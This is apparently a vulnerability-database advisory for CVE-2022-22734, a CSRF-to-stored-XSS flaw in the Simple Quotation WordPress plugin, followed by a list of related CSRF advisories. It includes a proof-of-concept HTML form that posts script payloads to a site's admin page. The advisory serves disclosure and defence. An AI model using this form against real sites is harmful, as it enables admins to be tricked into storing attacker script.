Simple Quotation <= 1.3.2 – Quote Creation/Edition via CSRF to Stored Cross-Site Scripting | CVE 2022-22734 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=simple-quotation/simple-quotation.php" method="POST">
      <input type="hidden" name="author" value="<script>alert(/XSS-image/)</script>" />
      <input type="hidden" name="newquotes" value="<script>alert(/XSS-quote/)</script>" />
      <input type="hidden" name="add" value="Add the quote" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

simple-quotation

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Abhishek Bhoir

Submitter

Abhishek Bhoir

Verified

Yes

WPVDB ID

f6e15a23-8f8c-47c2-8227-e277856d8251

Timeline

Publicly Published

2022-02-16 (about 3 years ago)

Added

2022-02-16 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2023-09-01

Title

Responsive Gallery Grid < 2.3.14 - Settings Update via CSRF

Published

2022-09-01

Title

GetResponse < 5.5.21 - API Key Update via CSRF

Published

2021-08-11

Title

Per Page Add to Head < 1.4.4 - CSRF to Stored XSS

Published

2025-02-03

Title

Custom Comment Notifications <= 1.0.8 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-03-31

Title

Appointy Appointment Scheduler <= 4.2.1 - Cross-Site Request Forgery to Settings Change